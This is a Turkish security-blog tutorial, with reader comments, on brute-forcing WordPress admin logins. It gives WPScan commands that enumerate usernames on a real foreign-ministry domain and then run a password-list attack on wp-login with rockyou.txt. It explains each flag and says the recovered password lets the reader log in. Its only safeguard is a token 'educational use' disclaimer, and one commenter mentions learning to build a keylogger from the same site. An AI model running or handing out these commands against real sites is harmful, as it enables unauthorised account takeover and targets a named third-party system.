WordPress Sitelere Brute Force Yapma

 Brute Force Nedir:

Türkçesi, Kaba Kuvvet Saldırısı olan; en basit tabiriyle bir şifre listesinin hedef sisteme denenmesidir. Bunun için milyonlarca şifrelerden oluşan şifre listeleri hazırlanılabilir, hazırlanan bu şifre listelerine "word list" denir. Kişiye ve sisteme özel olarak entegre edilebilirler ve üretilebilirler, daha önceki yazılarımızda kişiye veya sisteme özel "world list" oluşturmayı göstermiştik. Bu "word listler" seri bir şekilde denenerek sistemlere giriş yapılabilir. Brute Force Saldırısından korunmak için yapılabilecek en basit şey ise, tahmin edilmesi zor şifreler oluşturmak ve şifrelerin içinde yaygın karakterler (örneğin: 123456) kullanmamaktır.



Şimdi ise gelelim asıl konumuza, WordPress Sitelere Brute Force Yapma:

Bize gerekli olan tool "WpScann". Hackerler ve Siber Güvenlikçiler için oluşturulmuş, kolay bir şekilde sızma testleri yapabileceğiniz işletim sistemi, Kali Linux üzerinde kurulu bir şekilde geliyor. 


WpScann, WordPerss siteler için oluşturulmuş özel bir sızma testi programıdır. Biz elbette eğitim amaçlı kullanmayı gösteriyoruz, kötü amaçlar için kullanımından kesinlikle www.siberguvenlikblogu.com olarak biz sorumlu değiliz.

İhtiyacımız olan şeylerden birisi Admin'in kullancı adı, genelde "admin" olsa da her WordPress sitesi için aynı olmaz

Bu komut ile hedef WordPress sistemindeki kullanıcı adlarını bulabilirsiniz:


wpscan --url https://ihra2021.mfa.gr disable-tls-check --enumerate u 




Şimdi ise bulunan kullanıcıya Brute Force Saldısı Yapmak için gereken kod:

wpscan --url hedef_url disable-tls-check --usernames hedef_kullanıcı --passwords /usr/share/wordlists/rockyou.txt -t 3 --password-attack wp-login

Parametreleri açıklamak gerekirse ;

disable-tls-check: Tls sertifikası kontrolünün atlanması için gerekli
--usernames: Brute Force yapılacak kullanıcı adı
--passwords: World List konumu 
-t: threads 3 önerimizdir (siteden siteye değişiklik yapabilirsiniz)
--pasword-attack: Brute Force yapmak için parametre
wp-login: Admin Paneli (bu her sitede aynı olmayabilir ama WordPress sitelerin çoğunda böyle)


Hedef sisteme giriş yaptığında size şifreyi otomatik olarak bildirecektir. O kullanıcı adı ve şifreyle sisteme giriş yapabilirsiniz.

Son olarak da belirtmek gerekirse WPScann Toolu çok karmaşık bir yapıya ve çok sayıda parametreye sahiptir. WPScann hakkında ilerleyen zamanlarda daha detaylı makaleler de gelecek.

6 Yorumlar

  1. Hocam merhaba şöyle bir hata alıyorum sizinle nerden iletişime geçebilirm. Server error, try reducing the number of threads.

    YanıtlaSil
    Yanıtlar
    1. Instagram Twitter ve iletisim@siberguvenlikblogu.com mail adresinden ulaşabilirsiniz

      Sil
  2. abi adamsınız sizin sayenizde python ile keylogger yapmayı öğrettim şimdi bunaada

    YanıtlaSil
Yorum Gönder
Daha yeni Daha eski